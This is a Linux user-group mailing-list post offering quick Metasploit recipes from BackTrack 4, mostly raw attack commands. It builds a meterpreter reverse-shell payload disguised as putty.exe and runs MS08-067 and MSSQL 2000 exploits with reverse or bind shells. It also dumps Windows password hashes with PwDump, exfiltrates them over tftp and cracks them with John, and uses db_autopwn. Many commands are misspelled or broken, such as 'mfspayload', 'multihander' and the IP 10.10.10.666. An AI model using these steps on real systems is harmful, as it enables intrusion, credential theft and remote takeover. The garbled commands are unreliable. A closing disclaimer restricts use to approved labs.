Okay, you guys, here's a couple of HowTo's for basic Metasploit from Backtrack4R1:
0) Quick Windows MultiHandler Reverse Shell startx /etc/init.d/./wicd start {check your wireless or wired connection is working} mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 >/root/payload.exe optimize /root/putty.exe (for Windows target) msfconsole mfs> use exploit/multihander mfs> set PAYLOAD windows/meterpreter/reverse_tcp mfs> show options mfs> set RHOST (local host ip) mfs> shell go mfsconsole > migrate <process #> example msfconsole > migrate 256 mfs> show explore mfs> use name (from show explore) mfs> set PAYLOAD mfs> set RHOST mfs> set LHOST 1) Nmap Mssql 2000 nmap -sT -0 10.10.10.254 nmap -sV 10.10.10.254 mfsconsole show exploits cut and paste with your mouse highlight use mssql2000_resolution set PAYLOAD win32_bind_meterpreter show options set RHOST (target) 10.10.10.254 exploit help execute -n Process execute -f file execute -f cmd -c interact 1 ipconfig see Menu---->System-->MISC--->TFTPD Server Start On your Backtrack Linux shell: cd /pentest/windows-binaries/tools ls cp PwDmp4.dll /tmp/PwDmp4.exe cd /pentest/password/dictionaries ls cp wordlist.txt.gz /tmp/wordlist.txt tftp -i 10.10.10.254 get PwDump4.dll (or exe) tftp -i 10.10.10.254 get nc,exe <go back to windows shell> pwDmp4.exe pwDmp4.exe \l \o:pwdmp4.txt tftp 10.10.10.666 (our ip) put pwdmp4.txt <back to linux BT environment shell> cat pwdmp4.txt john pwdmp4.txt john -show pwdmp4.txt john -w:wordlist.txt -f:NT pwdmp4.txt <back to Windows> nc -L -p 10.10.10.254 <back to BT linux shell> telnet victim - login as Administrator with password 2) Quick VNC using Autopwn mfsconsole db_create foo db_nmap <targetip or> 10.10.10.254 db_autopwn -h db_autopwn -p -e sessions -i 1 sysinfo run vnc_oneport 3) Quick SMB (use another exploit if you like) & VNC Reverse Shell mfsconsole use windows/smb/ms08_067_netapi show options set PAYLOAD windows/vncinject/reverse_tcp show options set RHOST 10.10.10.254 show options set LHOST 10.10.10.666 exploit <spawns a shell on reverse machine> 4) Example using Nessus Plugins and db_autopwn <shell> apt-get install nessusd nessus nessusd (takes about 10 minutes to start) cd /pentest/exploits/framework3 svn update ./mfsconsole <another shell> ./nessus Start a scan and Generate a Report mfs> help mfs> db_create /root/database/foobar.db mfs> db_import Cross reference from report showing exploit port open and probable reported from Nessus Save output of the Nessus report to /root/nessus.nbe mfs> db_import_nessus_nbe /root/nessus.nbe mfs> db_autopwn -p -e Viola! * **DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories only and for fully qualified professionals after written Corporate approval. We do not advocate "cracking" and prefer the definition hacker<http://hacker.>in it's original term meaning those who reverse engineer and creatively evaluate to learn. We do not advocate "learning to hack"; instead hacking to learn.* Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com January 29, 2011, Noon until 3PM. -- (503) 754-4452 (623) 688-3392 http://www.obnosis.com
--------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss